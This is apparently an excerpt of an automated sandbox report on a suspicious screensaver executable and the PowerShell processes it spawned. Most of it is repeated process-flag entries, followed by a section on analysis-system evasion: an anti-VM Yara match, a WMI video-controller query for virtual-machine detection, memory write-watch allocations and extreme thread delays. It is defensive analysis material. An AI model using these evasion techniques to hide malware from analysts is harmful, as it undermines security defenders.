              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: THITWNSEI24112908089786756456545346568789-00010.scr.exe PID: 4916, type: MEMORYSTR
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 13D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 3070000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 2DD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 80D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 75C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 90D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: A0D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 30C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 3300000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeMemory allocated: 5300000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeWindow / User API: threadDelayed 453Jump to behavior
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exeWindow / User API: threadDelayed 9372Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5948Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2848Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8015Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1605Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7858Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1829Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6649
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3105
              Source: C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe TID: 3620Thread sleep time: -922337203685477s >= -30000sJump to behavior
